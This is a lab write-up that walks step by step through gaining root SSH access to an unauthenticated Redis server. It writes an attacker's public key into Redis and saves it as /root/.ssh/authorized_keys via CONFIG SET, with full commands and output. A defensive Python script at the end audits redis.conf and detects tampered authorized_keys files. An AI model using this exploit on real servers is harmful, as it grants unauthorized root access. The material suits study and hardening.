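Conditions for the vulnerability
(1) redis is bound to 0.0.0.0:6379 with no security policy in place, such as firewall rules that block access from untrusted source IPs, so it is directly exposed to the public network;
(2) no password authentication is configured (the password is usually empty), so the redis service can be logged in to remotely without a password.
Reproduction environment
- Target machine:
1. centos6.5-32bit, IP address 192.168.10.136
2. redis-3.2.9
(2.1) Compiling and installing redis from source produces an error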
In file included from adlist.c:34:
zmalloc.h:50:31: error: jemalloc/jemalloc.h: No such file or directory
zmalloc.h:55:2: error: #error "Newer version of jemalloc required"
Compiling redis fails with error: jemalloc/jemalloc.h: No such file or directory
The cause is that jemalloc overrides the ANSI C malloc and free functions on Linux.
Fix: pass an extra parameter to make.
make MALLOC=libc
make install
mkdir /etc/redis
cp redis.conf /etc/redis/
(2.2) redis configuration file
vi /etc/redis/redis.conf
Comment out the bind line: #bind 127.0.0.1
Change protected-mode to no:
protected-mode no
- Attacking machine:
centos6.5-32bit, IP address 192.168.10.172
(1) Generate a key pair.
ssh-keygen -t rsa
# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
6d:54:ad:98:e8:04:52:47:e4:c3:d3:d5:e7:57:4c:f3 [email protected]
The key's randomart image is:
+--[ RSA 2048]----+
| ..o+ oo +.|
| . .+ . o o *|
| . .=.oo . oE|
| o=o . o|
| oS o .|
| .. |
| |
| |
| |
+-----------------+
This creates the files id_rsa (private key) and id_rsa.pub (public key) in the /root/.ssh/ directory
(2) Store the public key contents in redis
(echo -e "\n\n";cat /root/.ssh/id_rsa.pub;echo -e "\n\n";) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
[root@localhost .ssh]# (echo -e "\n\n";cat /root/.ssh/id_rsa.pub;echo -e "\n\n";) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
OK
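(3) Connect to redis remotely with redis-cli, set the save path, and save
/usr/local/bin/redis-cli -h 192.168.10.136
config set dir /root/.ssh
Note: the /root/.ssh directory must already exist on the target machine; otherwise the setting fails with (error) ERR Changing directory: No such file or directory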
192.168.10.136:6379> config set dir /root/.ssh
OK
192.168.10.136:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.10.136:6379> config set dbfilename authorized_keys
OK
192.168.10.136:6379> config get dbfilename
1) "dbfilename"
2) "authorized_keys"
192.168.10.136:6379> save
OK
192.168.10.136:6379> exit
- Finally
ssh [email protected]: running this connects directly to the target machine.
Note: on CentOS, passwordless SSH login requires SELinux to be disabled
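From the defending side, the two conditions listed at the top of this page and the file left behind by the save step can both be checked mechanically. The Python below is an added example, not part of the original write-up: it audits a redis.conf for those conditions and tests whether a file such as authorized_keys is actually a redis dump. The sample configs, byte strings and function names are constructed for illustration, and the dump check assumes the RDB header format ("REDIS" followed by a four-digit version).

```python
import re

# Constructed sample: the weakened settings from the lab target above.
WEAK_CONF = "# bind 127.0.0.1\nprotected-mode no\nport 6379\n"
# Constructed sample: a hardened counterpart (the password is a placeholder).
HARDENED_CONF = "bind 127.0.0.1\nprotected-mode yes\nrequirepass <placeholder-secret>\n"


def parse_directives(text):
    """Return {directive: [args]} keeping the last occurrence of each directive."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # a commented-out bind line counts as absent
        parts = line.split()
        conf[parts[0].lower()] = parts[1:]
    return conf


def audit_redis_conf(text):
    """List the exposure conditions from this page that the config satisfies."""
    conf = parse_directives(text)
    findings = []
    bind = conf.get("bind")
    if bind is None:
        findings.append("no bind directive: listens on all interfaces")
    elif any(addr in ("0.0.0.0", "*", "::") for addr in bind):
        findings.append("bind includes a wildcard address")
    if conf.get("protected-mode", ["yes"])[0].lower() == "no":
        findings.append("protected-mode is disabled")
    password = (conf.get("requirepass") or [""])[0].strip("\"'")
    if not password:
        findings.append("requirepass is empty: no password authentication")
    return findings


def looks_like_rdb(data):
    """True if the bytes start with an RDB header, e.g. b'REDIS0007'."""
    return re.match(rb"REDIS\d{4}", data) is not None


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf))
    # Constructed bytes: an RDB header with a key line embedded after it.
    print(looks_like_rdb(b"REDIS0007\xfa\n\nssh-rsa AAAA\n\n"))
```

On a real host, pass the contents of /etc/redis/redis.conf to audit_redis_conf and the first bytes of each account's authorized_keys to looks_like_rdb; a legitimate authorized_keys file never begins with the RDB header.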